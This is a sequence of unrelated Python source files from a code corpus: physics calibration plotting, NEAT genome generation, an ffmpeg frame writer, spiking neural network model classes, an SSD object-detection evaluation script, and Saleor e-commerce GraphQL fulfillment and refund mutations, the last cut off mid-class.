plt.title(f'Bucket {bucket}')
d = self.injections[kpix][channel, bucket, 200:]
dacs = np.array(list(range(200,256)))
adcs = d
x = np.repeat(dacs, len(adcs[0]))
y = adcs.flatten()
regression = stats.linregress(x,y)
m, b, r, p, err = regression
plt.plot(x, y, 'o', label='samples')
plt.plot(x, m*x+b, '--r', label='fit')
plt.text(np.min(x)+10, np.max(y)-100, f'm={m}, b={b}, r={r}, p={p}, err={err}')
plt.legend()
plt.show()
# print('-------')
# if typeField == 0:
# print('Parsed Data Sample:')
# print(f'KPIX: {kpixId}')
# print(f'Timestamp: {timestamp}')
# print(f'Row: {row}')
# print(f'Col: {col}')
# print(f'ADC: {adc:04x}')
# print(f'Bucket: {bucket}')
# print(f'TriggerFlag: {triggerFlag}')
# print(f'RangeFlag: {rangeFlag}')
# print(f'BadCountFlag: {badCountFlag}')
# print(f'Emptyflag: {emptyFlag}')
# elif typeField == 1:
# print('Parsed Temperature Sample')
# print(f'KPIX: {kpixId}')
# print(f'Temperature: {getField(value, 7, 0)}')
# print(f'TempCount: {getField(value, 31, 24)}')
# else:
# print(f'Unknown type field: {typeField}')
# print('-------')
|
the-stack_106_30624 | #!/usr/bin/env python
def main():
np_hidden = 0
np_input = 1
np_output = 2
np_bias = 3
nt_neuron = 0
nt_sensor = 1
num_inputs = 19 + 18 + 0
num_outputs = 12
nodes = []
genes = []
# next_node_id = 1
# def get_next_node_id()
# nonlocal next_node_id
# a = next_node_id
# next_node_id += 1
# return a
trait_num = 0
nodes.append(f'node 1 {trait_num} {nt_sensor} {np_bias}')
for input_id in range(2, num_inputs + 2):
nodes.append(f'node {input_id} {trait_num} {nt_sensor} {np_input}')
for output_id in range(num_inputs + 2, num_inputs + 2 + num_outputs):
nodes.append(f'node {output_id} {trait_num} {nt_neuron} {np_output}')
trait_num = 1
innov = 0
for input_id in range(2, num_inputs + 2):
for output_id in range(num_inputs + 2, num_inputs + 2 + num_outputs):
innov += 1
genes.append(f'gene {trait_num} {input_id} {output_id} 0.0 0 {innov} 0 1')
for node in nodes:
print(node)
for gene in genes:
print(gene)
if __name__ == '__main__':
main()
|
the-stack_106_30625 | from subprocess import DEVNULL, PIPE, Popen
DEFAULT_FPS = 24
DEFAULT_OUTPUT_PATH = "video.mkv"
class VideoWriter:
def __init__(self, fps=DEFAULT_FPS, output_path=DEFAULT_OUTPUT_PATH):
args = [
"ffmpeg",
"-y",
"-f",
"image2pipe",
"-vcodec",
"png",
"-framerate",
str(fps),
"-i",
"-",
"-vcodec",
"libx264",
output_path,
]
self.process = Popen(args, stdin=PIPE, stdout=DEVNULL, stderr=DEVNULL)
def add_frame(self, frame):
frame.write_to_png(self.process.stdin)
def __del__(self):
self.process.stdin.close()
self.process.wait()
|
the-stack_106_30626 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
''' Title '''
__author__ = 'Hiroshi Kajino <[email protected]>'
__copyright__ = 'Copyright IBM Corp. 2020, 2021'
from copy import deepcopy
from .base import POMultivariatePointProcess
from .thinning import MultivariateThinningAlgorithmForPOMixin
from ..pp.snn import SNNBase
from ..pp.activation import (SigmoidActivationMixin,
ExpActivationMixin,
HardtanhActivationMixin)
class POSNNBase(SNNBase, POMultivariatePointProcess):
def __init__(self,
n_obs_neurons,
n_hidden_neurons,
connection_tensor=None,
n_inducing_points=5,
low=0.0,
high=10.0,
kernel_kwargs={},
activation_kwargs={},
lmbd=1e-1,
seed=43,
**kwargs):
super().__init__(n_neurons=n_obs_neurons+n_hidden_neurons,
connection_tensor=connection_tensor,
n_inducing_points=n_inducing_points,
low=low,
high=high,
kernel_kwargs=kernel_kwargs,
activation_kwargs=activation_kwargs,
lmbd=lmbd,
seed=seed,
**kwargs)
self.n_obs_neurons = n_obs_neurons
self.n_hidden_neurons = n_hidden_neurons
self.obs_neuron_list = list(range(n_obs_neurons))
self.hidden_neuron_list = list(range(n_obs_neurons,
n_obs_neurons+n_hidden_neurons))
@property
def obs_dim(self):
return self.n_obs_neurons
@property
def hidden_dim(self):
return self.n_hidden_neurons
def transfer_model(self, train_model):
self.n_obs_neurons = train_model.n_obs_neurons
self.n_hidden_neurons = train_model.n_hidden_neurons
self.n_neurons = train_model.n_neurons
self.n_inducing_points = train_model.n_inducing_points
self.connection_tensor = train_model.connection_tensor
for each_param in self.params:
self.params[each_param].data = deepcopy(train_model.params[each_param].data)
# reinforce estimator
class SigmoidPOSNN(MultivariateThinningAlgorithmForPOMixin,
SigmoidActivationMixin,
POSNNBase):
pass
class ExpPOSNN(MultivariateThinningAlgorithmForPOMixin,
ExpActivationMixin,
POSNNBase):
pass
class HardtanhPOSNN(MultivariateThinningAlgorithmForPOMixin,
HardtanhActivationMixin,
POSNNBase):
pass
|
the-stack_106_30628 | from __future__ import print_function
import sys
import os
import pickle
import argparse
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
import torchvision.transforms as transforms
import numpy as np
from torch.autograd import Variable
from data import *
from ssd import build_ssd
# from data import VOCroot,COCOroot
# from data import AnnotationTransform, COCODetection, VOCDetection, BaseTransform, VOC_300,VOC_512,COCO_300,COCO_512, COCO_mobile_300
import torch.utils.data as data
from layers.functions import Detect,PriorBox
from rfb_tools.nms_wrapper import nms
from rfb_tools.timer import Timer
parser = argparse.ArgumentParser(description='Receptive Field Block Net')
parser.add_argument('-v', '--version', default='RFB_vgg',
help='RFB_vgg ,RFB_E_vgg or RFB_mobile version.')
parser.add_argument('-s', '--size', default='300',
help='300 or 512 input size.')
parser.add_argument('-d', '--dataset', default='COCO',
help='VOC or COCO version')
parser.add_argument('-m', '--trained_model', default='weights/COCO.pth',
type=str, help='Trained state_dict file path to open')
parser.add_argument('--save_folder', default='eval/', type=str,
help='Dir to save results')
parser.add_argument('--cuda', default=True, type=bool,
help='Use cuda to train model')
parser.add_argument('--cpu', default=False, type=bool,
help='Use cpu nms')
parser.add_argument('--retest', default=False, type=bool,
help='test cache results')
args = parser.parse_args()
if not os.path.exists(args.save_folder):
os.mkdir(args.save_folder)
'''
if args.dataset == 'VOC':
cfg = (VOC_300, VOC_512)[args.size == '512']
else:
cfg = (COCO_300, COCO_512)[args.size == '512']
'''
if args.dataset == 'VOC':
cfg = (voc, voc)[args.size == '512']
else:
cfg = (coco, coco)[args.size == '512']
'''
if args.version == 'RFB_vgg':
from models.RFB_Net_vgg import build_net
elif args.version == 'RFB_E_vgg':
from models.RFB_Net_E_vgg import build_net
elif args.version == 'RFB_mobile':
from models.RFB_Net_mobile import build_net
cfg = COCO_mobile_300
else:
print('Unkown version!')
'''
priorbox = PriorBox(cfg)
with torch.no_grad():
priors = priorbox.forward()
if args.cuda:
priors = priors.cuda()
def test_net(save_folder, net, cuda, testset, transform, max_per_image=300, thresh=0.005):
if not os.path.exists(save_folder):
os.mkdir(save_folder)
# dump predictions and assoc. ground truth to text file for now
num_images = len(testset)
num_classes = (21, 81)[args.dataset == 'COCO']
all_boxes = [[[] for _ in range(num_images)]
for _ in range(num_classes)]
_t = {'im_detect': Timer(), 'misc': Timer()}
det_file = os.path.join(save_folder, 'detections.pkl')
if args.retest:
f = open(det_file, 'rb')
all_boxes = pickle.load(f)
print('Evaluating detections')
testset.evaluate_detections(all_boxes, save_folder)
print('Evalutating done')
return
for i in range(num_images):
img, _, h, w = testset.pull_item(i)
scale = torch.Tensor([w, h,
w, h])
with torch.no_grad():
# x = transform(img).unsqueeze(0)
x = img.unsqueeze(0)
if cuda:
x = x.cuda()
scale = scale.cuda()
_t['im_detect'].tic()
detections = net(x) # forward pass
detections.detach_()
detect_time = _t['im_detect'].toc(average=False)
# skip j = 0, because it's the background class
for j in range(1, detections.size(1)):
dets = detections[0, j, :]
mask = dets[:, 0].gt(0.).expand(5, dets.size(0)).t()
dets = torch.masked_select(dets, mask).view(-1, 5)
if dets.size(0) == 0:
continue
boxes = dets[:, 1:]
boxes[:, 0] *= w
boxes[:, 2] *= w
boxes[:, 1] *= h
boxes[:, 3] *= h
scores = dets[:, 0].cpu().numpy()
cls_dets = np.hstack((boxes.cpu().numpy(),
scores[:, np.newaxis])).astype(np.float32,
copy=False)
all_boxes[j][i] = cls_dets
'''
# boxes, scores = detector.forward(out,priors)
detect_time = _t['im_detect'].toc()
boxes = boxes[0]
scores = scores[0]
boxes *= scale
boxes = boxes.cpu().numpy()
scores = scores.cpu().numpy()
# scale each detection back up to the image
_t['misc'].tic()
for j in range(1, num_classes):
inds = np.where(scores[:, j] > thresh)[0]
if len(inds) == 0:
all_boxes[j][i] = np.empty([0, 5], dtype=np.float32)
continue
c_bboxes = boxes[inds]
c_scores = scores[inds, j]
c_dets = np.hstack((c_bboxes, c_scores[:, np.newaxis])).astype(
np.float32, copy=False)
keep = nms(c_dets, 0.45, force_cpu=args.cpu)
c_dets = c_dets[keep, :]
all_boxes[j][i] = c_dets
if max_per_image > 0:
image_scores = np.hstack([all_boxes[j][i][:, -1] for j in range(1,num_classes)])
if len(image_scores) > max_per_image:
image_thresh = np.sort(image_scores)[-max_per_image]
for j in range(1, num_classes):
keep = np.where(all_boxes[j][i][:, -1] >= image_thresh)[0]
all_boxes[j][i] = all_boxes[j][i][keep, :]
nms_time = _t['misc'].toc()
'''
if i % 20 == 0:
print('im_detect: {:d}/{:d} {:.3f}s'
.format(i + 1, num_images, detect_time))
_t['im_detect'].clear()
with open(det_file, 'wb') as f:
pickle.dump(all_boxes, f, pickle.HIGHEST_PROTOCOL)
print('Evaluating detections')
testset.evaluate_detections(all_boxes, save_folder)
if __name__ == '__main__':
# load net
img_dim = (300,512)[args.size=='512']
num_classes = (21, 81)[args.dataset == 'COCO']
net = build_ssd('test', img_dim, num_classes) # initialize detector
state_dict = torch.load(args.trained_model)
# create new OrderedDict that does not contain `module.`
from collections import OrderedDict
new_state_dict = OrderedDict()
for k, v in state_dict.items():
head = k[:7]
if head == 'module.':
name = k[7:] # remove `module.`
else:
name = k
new_state_dict[name] = v
net.load_state_dict(new_state_dict)
net.eval()
print('Finished loading model!')
print(net)
dataset_mean = (104, 117, 123)
# load data
if args.dataset == 'VOC':
testset = VOCDetection(
VOC_ROOT, [('2007', 'test')], None)
elif args.dataset == 'COCO':
testset = COCODetection(
# COCO_ROOT, [('2014', 'minival')], None)
COCO_ROOT, [('2015', 'test-dev')], BaseTransform(300, dataset_mean), None)
else:
print('Only VOC and COCO dataset are supported now!')
if args.cuda:
net = net.cuda()
cudnn.benchmark = True
else:
net = net.cpu()
# evaluation
top_k = (300, 200)[args.dataset == 'COCO']
# top_k = 200
save_folder = os.path.join(args.save_folder, args.dataset)
test_net(save_folder, net, args.cuda, testset,
BaseTransform(net.size, dataset_mean),
top_k, thresh=0.01)
print('Finished')
'''
detector = Detect(num_classes,0, 200, 0.01, 0.45)
save_folder = os.path.join(args.save_folder,args.dataset)
rgb_means = ((104, 117, 123),(103.94,116.78,123.68))[args.version == 'RFB_mobile']
test_net(save_folder, net, detector, args.cuda, testset,
BaseTransform(net.size, rgb_means, (2, 0, 1)),
top_k, thresh=0.01)
''' |
the-stack_106_30630 | from collections import defaultdict
import graphene
from django.core.exceptions import ValidationError
from django.template.defaultfilters import pluralize
from ....core.exceptions import InsufficientStock
from ....core.permissions import OrderPermissions
from ....core.tracing import traced_atomic_transaction
from ....giftcard.utils import get_gift_card_lines, gift_cards_create
from ....order import FulfillmentLineData, FulfillmentStatus, OrderLineData
from ....order import models as order_models
from ....order.actions import (
approve_fulfillment,
cancel_fulfillment,
cancel_waiting_fulfillment,
create_fulfillments,
create_fulfillments_for_returned_products,
create_refund_fulfillment,
fulfillment_tracking_updated,
)
from ....order.error_codes import OrderErrorCode
from ....order.notifications import send_fulfillment_update
from ...core.descriptions import ADDED_IN_31
from ...core.mutations import BaseMutation
from ...core.scalars import PositiveDecimal
from ...core.types.common import OrderError
from ...core.utils import get_duplicated_values
from ...utils import resolve_global_ids_to_primary_keys
from ...warehouse.types import Warehouse
from ..types import Fulfillment, FulfillmentLine, Order, OrderLine
from ..utils import prepare_insufficient_stock_order_validation_errors
class OrderFulfillStockInput(graphene.InputObjectType):
quantity = graphene.Int(
description="The number of line items to be fulfilled from given warehouse.",
required=True,
)
warehouse = graphene.ID(
description="ID of the warehouse from which the item will be fulfilled.",
required=True,
)
class OrderFulfillLineInput(graphene.InputObjectType):
order_line_id = graphene.ID(
description="The ID of the order line.", name="orderLineId"
)
stocks = graphene.List(
graphene.NonNull(OrderFulfillStockInput),
required=True,
description="List of stock items to create.",
)
class OrderFulfillInput(graphene.InputObjectType):
lines = graphene.List(
graphene.NonNull(OrderFulfillLineInput),
required=True,
description="List of items informing how to fulfill the order.",
)
notify_customer = graphene.Boolean(
description="If true, send an email notification to the customer."
)
class FulfillmentUpdateTrackingInput(graphene.InputObjectType):
tracking_number = graphene.String(description="Fulfillment tracking number.")
notify_customer = graphene.Boolean(
default_value=False,
description="If true, send an email notification to the customer.",
)
class OrderFulfill(BaseMutation):
fulfillments = graphene.List(
Fulfillment, description="List of created fulfillments."
)
order = graphene.Field(Order, description="Fulfilled order.")
class Arguments:
order = graphene.ID(
description="ID of the order to be fulfilled.", name="order"
)
input = OrderFulfillInput(
required=True, description="Fields required to create a fulfillment."
)
class Meta:
description = "Creates new fulfillments for an order."
permissions = (OrderPermissions.MANAGE_ORDERS,)
error_type_class = OrderError
error_type_field = "order_errors"
@classmethod
def clean_lines(cls, order_lines, quantities):
for order_line in order_lines:
line_total_quantity = quantities[order_line.pk]
line_quantity_unfulfilled = order_line.quantity_unfulfilled
if line_total_quantity > line_quantity_unfulfilled:
msg = (
"Only %(quantity)d item%(item_pluralize)s remaining "
"to fulfill: %(order_line)s."
) % {
"quantity": line_quantity_unfulfilled,
"item_pluralize": pluralize(line_quantity_unfulfilled),
"order_line": order_line,
}
order_line_global_id = graphene.Node.to_global_id(
"OrderLine", order_line.pk
)
raise ValidationError(
{
"order_line_id": ValidationError(
msg,
code=OrderErrorCode.FULFILL_ORDER_LINE,
params={"order_lines": [order_line_global_id]},
)
}
)
@classmethod
def check_warehouses_for_duplicates(cls, warehouse_ids):
for warehouse_ids_for_line in warehouse_ids:
duplicates = get_duplicated_values(warehouse_ids_for_line)
if duplicates:
raise ValidationError(
{
"warehouse": ValidationError(
"Duplicated warehouse ID.",
code=OrderErrorCode.DUPLICATED_INPUT_ITEM,
params={"warehouse": duplicates.pop()},
)
}
)
@classmethod
def check_lines_for_duplicates(cls, lines_ids):
duplicates = get_duplicated_values(lines_ids)
if duplicates:
raise ValidationError(
{
"orderLineId": ValidationError(
"Duplicated order line ID.",
code=OrderErrorCode.DUPLICATED_INPUT_ITEM,
params={"order_lines": [duplicates.pop()]},
)
}
)
@classmethod
def check_total_quantity_of_items(cls, quantities_for_lines):
flat_quantities = sum(quantities_for_lines, [])
if sum(flat_quantities) <= 0:
raise ValidationError(
{
"lines": ValidationError(
"Total quantity must be larger than 0.",
code=OrderErrorCode.ZERO_QUANTITY,
)
}
)
@classmethod
def clean_input(cls, info, order, data):
site_settings = info.context.site.settings
if not order.is_fully_paid() and (
site_settings.fulfillment_auto_approve
and not site_settings.fulfillment_allow_unpaid
):
raise ValidationError(
{
"order": ValidationError(
"Cannot fulfill unpaid order.",
code=OrderErrorCode.CANNOT_FULFILL_UNPAID_ORDER.value,
)
}
)
lines = data["lines"]
warehouse_ids_for_lines = [
[stock["warehouse"] for stock in line["stocks"]] for line in lines
]
cls.check_warehouses_for_duplicates(warehouse_ids_for_lines)
quantities_for_lines = [
[stock["quantity"] for stock in line["stocks"]] for line in lines
]
lines_ids = [line["order_line_id"] for line in lines]
cls.check_lines_for_duplicates(lines_ids)
order_lines = cls.get_nodes_or_error(
lines_ids, field="lines", only_type=OrderLine
)
order_line_id_to_total_quantity = {
order_line.pk: sum(line_quantities)
for order_line, line_quantities in zip(order_lines, quantities_for_lines)
}
cls.clean_lines(order_lines, order_line_id_to_total_quantity)
cls.check_total_quantity_of_items(quantities_for_lines)
lines_for_warehouses = defaultdict(list)
for line, order_line in zip(lines, order_lines):
for stock in line["stocks"]:
if stock["quantity"] > 0:
warehouse_pk = cls.get_global_id_or_error(
stock["warehouse"], only_type=Warehouse, field="warehouse"
)
lines_for_warehouses[warehouse_pk].append(
{"order_line": order_line, "quantity": stock["quantity"]}
)
data["order_lines"] = order_lines
data["gift_card_lines"] = cls.get_gift_card_lines(lines_ids)
data["quantities"] = order_line_id_to_total_quantity
data["lines_for_warehouses"] = lines_for_warehouses
return data
@staticmethod
def get_gift_card_lines(lines_ids):
_, pks = resolve_global_ids_to_primary_keys(
lines_ids, OrderLine, raise_error=True
)
return get_gift_card_lines(pks)
@classmethod
@traced_atomic_transaction()
def perform_mutation(cls, _root, info, order, **data):
order = cls.get_node_or_error(info, order, field="order", only_type=Order)
data = data.get("input")
cleaned_input = cls.clean_input(info, order, data)
context = info.context
user = context.user if not context.user.is_anonymous else None
app = context.app
manager = context.plugins
lines_for_warehouses = cleaned_input["lines_for_warehouses"]
notify_customer = cleaned_input.get("notify_customer", True)
gift_card_lines = cleaned_input["gift_card_lines"]
quantities = cleaned_input["quantities"]
gift_cards_create(
order,
gift_card_lines,
quantities,
context.site.settings,
user,
app,
manager,
)
try:
fulfillments = create_fulfillments(
user,
app,
order,
dict(lines_for_warehouses),
manager,
notify_customer,
approved=info.context.site.settings.fulfillment_auto_approve,
)
except InsufficientStock as exc:
errors = prepare_insufficient_stock_order_validation_errors(exc)
raise ValidationError({"stocks": errors})
return OrderFulfill(fulfillments=fulfillments, order=order)
class FulfillmentUpdateTracking(BaseMutation):
fulfillment = graphene.Field(
Fulfillment, description="A fulfillment with updated tracking."
)
order = graphene.Field(
Order, description="Order for which fulfillment was updated."
)
class Arguments:
id = graphene.ID(required=True, description="ID of a fulfillment to update.")
input = FulfillmentUpdateTrackingInput(
required=True, description="Fields required to update a fulfillment."
)
class Meta:
description = "Updates a fulfillment for an order."
permissions = (OrderPermissions.MANAGE_ORDERS,)
error_type_class = OrderError
error_type_field = "order_errors"
@classmethod
def perform_mutation(cls, _root, info, **data):
fulfillment = cls.get_node_or_error(info, data.get("id"), only_type=Fulfillment)
tracking_number = data.get("input").get("tracking_number") or ""
fulfillment.tracking_number = tracking_number
fulfillment.save()
order = fulfillment.order
fulfillment_tracking_updated(
fulfillment,
info.context.user,
info.context.app,
tracking_number,
info.context.plugins,
)
input_data = data.get("input", {})
notify_customer = input_data.get("notify_customer")
if notify_customer:
send_fulfillment_update(order, fulfillment, info.context.plugins)
return FulfillmentUpdateTracking(fulfillment=fulfillment, order=order)
class FulfillmentCancelInput(graphene.InputObjectType):
warehouse_id = graphene.ID(
description="ID of a warehouse where items will be restocked. Optional "
"when fulfillment is in WAITING_FOR_APPROVAL state.",
required=False,
)
class FulfillmentCancel(BaseMutation):
fulfillment = graphene.Field(Fulfillment, description="A canceled fulfillment.")
order = graphene.Field(Order, description="Order which fulfillment was cancelled.")
class Arguments:
id = graphene.ID(required=True, description="ID of a fulfillment to cancel.")
input = FulfillmentCancelInput(
required=False, description="Fields required to cancel a fulfillment."
)
class Meta:
description = "Cancels existing fulfillment and optionally restocks items."
permissions = (OrderPermissions.MANAGE_ORDERS,)
error_type_class = OrderError
error_type_field = "order_errors"
@classmethod
def validate_fulfillment(cls, fulfillment, warehouse):
if not fulfillment.can_edit():
raise ValidationError(
{
"fulfillment": ValidationError(
"This fulfillment can't be canceled",
code=OrderErrorCode.CANNOT_CANCEL_FULFILLMENT,
)
}
)
if (
fulfillment.status != FulfillmentStatus.WAITING_FOR_APPROVAL
and not warehouse
):
raise ValidationError(
{
"warehouseId": ValidationError(
"This parameter is required for fulfillments which are not in "
"WAITING_FOR_APPROVAL state.",
code=OrderErrorCode.REQUIRED,
)
}
)
@classmethod
def perform_mutation(cls, _root, info, **data):
fulfillment = cls.get_node_or_error(info, data.get("id"), only_type=Fulfillment)
warehouse = None
if fulfillment.status == FulfillmentStatus.WAITING_FOR_APPROVAL:
warehouse = None
elif warehouse_id := data.get("input", {}).get("warehouse_id"):
warehouse = cls.get_node_or_error(
info, warehouse_id, only_type="Warehouse", field="warehouse_id"
)
cls.validate_fulfillment(fulfillment, warehouse)
order = fulfillment.order
if fulfillment.status == FulfillmentStatus.WAITING_FOR_APPROVAL:
fulfillment = cancel_waiting_fulfillment(
fulfillment,
info.context.user,
info.context.app,
info.context.plugins,
)
else:
fulfillment = cancel_fulfillment(
fulfillment,
info.context.user,
info.context.app,
warehouse,
info.context.plugins,
)
order.refresh_from_db(fields=["status"])
return FulfillmentCancel(fulfillment=fulfillment, order=order)
class FulfillmentApprove(BaseMutation):
fulfillment = graphene.Field(Fulfillment, description="An approved fulfillment.")
order = graphene.Field(Order, description="Order which fulfillment was approved.")
class Arguments:
id = graphene.ID(required=True, description="ID of a fulfillment to approve.")
notify_customer = graphene.Boolean(
required=True, description="True if confirmation email should be send."
)
class Meta:
description = f"{ADDED_IN_31} Approve existing fulfillment."
permissions = (OrderPermissions.MANAGE_ORDERS,)
error_type_class = OrderError
error_type_field = "order_errors"
@classmethod
def clean_input(cls, info, fulfillment):
if fulfillment.status != FulfillmentStatus.WAITING_FOR_APPROVAL:
raise ValidationError(
"Invalid fulfillment status, only WAITING_FOR_APPROVAL "
"fulfillments can be accepted.",
code=OrderErrorCode.INVALID.value,
)
if (
not info.context.site.settings.fulfillment_allow_unpaid
and not fulfillment.order.is_fully_paid()
):
raise ValidationError(
"Cannot fulfill unpaid order.",
code=OrderErrorCode.CANNOT_FULFILL_UNPAID_ORDER,
)
@classmethod
def perform_mutation(cls, _root, info, **data):
fulfillment = cls.get_node_or_error(info, data["id"], only_type="Fulfillment")
cls.clean_input(info, fulfillment)
order = fulfillment.order
fulfillment = approve_fulfillment(
fulfillment,
info.context.user,
info.context.app,
info.context.plugins,
notify_customer=data["notify_customer"],
)
order.refresh_from_db(fields=["status"])
return FulfillmentApprove(fulfillment=fulfillment, order=order)
class OrderRefundLineInput(graphene.InputObjectType):
order_line_id = graphene.ID(
description="The ID of the order line to refund.",
name="orderLineId",
required=True,
)
quantity = graphene.Int(
description="The number of items to be refunded.",
required=True,
)
class OrderRefundFulfillmentLineInput(graphene.InputObjectType):
fulfillment_line_id = graphene.ID(
description="The ID of the fulfillment line to refund.",
name="fulfillmentLineId",
required=True,
)
quantity = graphene.Int(
description="The number of items to be refunded.",
required=True,
)
class OrderRefundProductsInput(graphene.InputObjectType):
order_lines = graphene.List(
graphene.NonNull(OrderRefundLineInput),
description="List of unfulfilled lines to refund.",
)
fulfillment_lines = graphene.List(
graphene.NonNull(OrderRefundFulfillmentLineInput),
description="List of fulfilled lines to refund.",
)
amount_to_refund = PositiveDecimal(
required=False,
description="The total amount of refund when the value is provided manually.",
)
include_shipping_costs = graphene.Boolean(
description=(
"If true, Saleor will refund shipping costs. If amountToRefund is provided"
"includeShippingCosts will be ignored."
),
default_value=False,
)
class FulfillmentRefundAndReturnProductBase(BaseMutation):
class Meta:
abstract = True
@classmethod
def clean_order_payment(cls, payment, cleaned_input):
if not payment or not payment.can_refund():
raise ValidationError(
{
"order": ValidationError(
"Order cannot be refunded.",
code=OrderErrorCode.CANNOT_REFUND.value,
)
}
)
cleaned_input["payment"] = payment
@classmethod
def clean_amount_to_refund(cls, amount_to_refund, payment, cleaned_input):
if amount_to_refund is not None and amount_to_refund > payment.captured_amount:
raise ValidationError(
{
"amount_to_refund": ValidationError(
(
"The amountToRefund is greater than the maximal possible "
"amount to refund."
),
code=OrderErrorCode.CANNOT_REFUND.value,
),
}
)
cleaned_input["amount_to_refund"] = amount_to_refund
@classmethod
def _raise_error_for_line(cls, msg, type, line_id, field_name, code=None):
line_global_id = graphene.Node.to_global_id(type, line_id)
if not code:
code = OrderErrorCode.INVALID_QUANTITY.value
raise ValidationError(
{
field_name: ValidationError(
msg,
code=code,
params={field_name: line_global_id},
)
}
)
@classmethod
def clean_fulfillment_lines(
cls, fulfillment_lines_data, cleaned_input, whitelisted_statuses
):
fulfillment_lines = cls.get_nodes_or_error(
[line["fulfillment_line_id"] for line in fulfillment_lines_data],
field="fulfillment_lines",
only_type=FulfillmentLine,
qs=order_models.FulfillmentLine.objects.prefetch_related(
"fulfillment", "order_line"
),
)
fulfillment_lines = list(fulfillment_lines)
cleaned_fulfillment_lines = []
for line, line_data in zip(fulfillment_lines, fulfillment_lines_data):
quantity = line_data["quantity"]
if line.quantity < quantity:
cls._raise_error_for_line(
"Provided quantity is bigger than quantity from "
"fulfillment line",
"FulfillmentLine",
line.pk,
"fulfillment_line_id",
)
if line.fulfillment.status not in whitelisted_statuses:
allowed_statuses_str = ", ".join(whitelisted_statuses)
cls._raise_error_for_line(
f"Unable to process action for fulfillmentLine with different "
f"status than {allowed_statuses_str}.",
"FulfillmentLine",
line.pk,
"fulfillment_line_id",
code=OrderErrorCode.INVALID.value,
)
replace = line_data.get("replace", False)
if replace and not line.order_line.variant_id:
cls._raise_error_for_line(
"Unable to replace line as the assigned product doesn't exist.",
"OrderLine",
line.pk,
"order_line_id",
)
cleaned_fulfillment_lines.append(
FulfillmentLineData(
line=line,
quantity=quantity,
replace=replace,
)
)
cleaned_input["fulfillment_lines"] = cleaned_fulfillment_lines
@classmethod
def clean_lines(cls, lines_data, cleaned_input):
order_lines = cls.get_nodes_or_error(
[line["order_line_id"] for line in lines_data],
field="order_lines",
only_type=OrderLine,
qs=order_models.OrderLine.objects.prefetch_related(
"fulfillment_lines__fulfillment", "variant", "allocations"
),
)
order_lines = list(order_lines)
cleaned_order_lines = []
for line, line_data in zip(order_lines, lines_data):
quantity = line_data["quantity"]
if line.quantity < quantity:
cls._raise_error_for_line(
"Provided quantity is bigger than quantity from order line.",
"OrderLine",
line.pk,
"order_line_id",
)
quantity_ready_to_move = line.quantity_unfulfilled
if quantity_ready_to_move < quantity:
cls._raise_error_for_line(
"Provided quantity is bigger than unfulfilled quantity.",
"OrderLine",
line.pk,
"order_line_id",
)
replace = line_data.get("replace", False)
if replace and not line.variant_id:
cls._raise_error_for_line(
"Unable to replace line as the assigned product doesn't exist.",
"OrderLine",
line.pk,
"order_line_id",
)
cleaned_order_lines.append(
OrderLineData(line=line, quantity=quantity, replace=replace)
)
cleaned_input["order_lines"] = cleaned_order_lines
class FulfillmentRefundProducts(FulfillmentRefundAndReturnProductBase):
fulfillment = graphene.Field(Fulfillment, description="A refunded fulfillment.")
order = graphene.Field(Order, description="Order which fulfillment was refunded.")
class Arguments:
order = graphene.ID(
description="ID of the order to be refunded.", required=True
)
input = OrderRefundProductsInput(
required=True,
description="Fields required to create an refund fulfillment.",
)
class Meta:
description = "Refund products."
permissions = (OrderPermissions.MANAGE_ORDERS,)
error_type_class = OrderError
error_type_field = "order_errors"
@classmethod
def clean_input(cls, info, order_id, input):
cleaned_input = {}
amount_to_refund = input.get("amount_to_refund")
include_shipping_costs = input["include_shipping_costs"]
qs = order_models.Order.objects.prefetch_related("payments")
order = cls.get_node_or_error(
info, order_id, field="order", only_type=Order, qs=qs
)
payment = order.get_last_payment()
cls.clean_order_payment(payment, cleaned_input)
cls.clean_amount_to_refund(amount_to_refund, payment, cleaned_input)
cleaned_input.update(
{"include_shipping_costs": include_shipping_costs, "order": order}
)
order_lines_data = input.get("order_lines", [])
fulfillment_lines_data = input.get("fulfillment_lines", [])
if order_lines_data:
cls.clean_lines(order_lines_data, cleaned_input)
if fulfillment_lines_data:
cls.clean_fulfillment_lines(
fulfillment_lines_data,
cleaned_input,
whitelisted_statuses=[
FulfillmentStatus.FULFILLED,
FulfillmentStatus.RETURNED,
FulfillmentStatus.WAITING_FOR_APPROVAL,
],
)
return cleaned_input
@classmethod
def perform_mutation(cls, _root, info, **data):
cleaned_input = cls.clean_input(info, data.get("order"), data.get("input"))
order = cleaned_input["order"]
refund_fulfillment = create_refund_fulfillment(
info.context.user,
info.context.app,
order,
cleaned_input["payment"],
cleaned_input.get("order_lines", []),
cleaned_input.get("fulfillment_lines", []),
info.context.plugins,
cleaned_input["amount_to_refund"],
cleaned_input["include_shipping_costs"],
)
return cls(order=order, fulfillment=refund_fulfillment)
class OrderReturnLineInput(graphene.InputObjectType):
order_line_id = graphene.ID(
description="The ID of the order line to return.",
name="orderLineId",
required=True,
)
quantity = graphene.Int(
description="The number of items to be returned.",
required=True,
)
replace = graphene.Boolean(
description="Determines, if the line should be added to replace order.",
default_value=False,
)
class OrderReturnFulfillmentLineInput(graphene.InputObjectType):
fulfillment_line_id = graphene.ID(
description="The ID of the fulfillment line to return.",
name="fulfillmentLineId",
required=True,
)
quantity = graphene.Int(
description="The number of items to be returned.",
required=True,
)
replace = graphene.Boolean(
description="Determines, if the line should be added to replace order.",
default_value=False,
)
class OrderReturnProductsInput(graphene.InputObjectType):
order_lines = graphene.List(
graphene.NonNull(OrderReturnLineInput),
description="List of unfulfilled lines to return.",
)
fulfillment_lines = graphene.List(
graphene.NonNull(OrderReturnFulfillmentLineInput),
description="List of fulfilled lines to return.",
)
amount_to_refund = PositiveDecimal(
required=False,
description="The total amount of refund when the value is provided manually.",
)
include_shipping_costs = graphene.Boolean(
description=(
"If true, Saleor will refund shipping costs. If amountToRefund is provided"
"includeShippingCosts will be ignored."
),
default_value=False,
)
refund = graphene.Boolean(
description="If true, Saleor will call refund action for all lines.",
default_value=False,
)
class FulfillmentReturnProducts(FulfillmentRefundAndReturnProductBase):
return_fulfillment = graphene.Field(
Fulfillment, description="A return fulfillment."
)
replace_fulfillment = graphene.Field(
Fulfillment, description="A replace fulfillment."
)
order = graphene.Field(Order, description="Order which fulfillment was returned.")
replace_order = graphene.Field(
Order,
description="A draft order which was created for products with replace flag.",
)
class Meta:
description = "Return products."
permissions = (OrderPermissions.MANAGE_ORDERS,)
error_type_class = OrderError
error_type_field = "order_errors"
class Arguments:
order = graphene.ID(
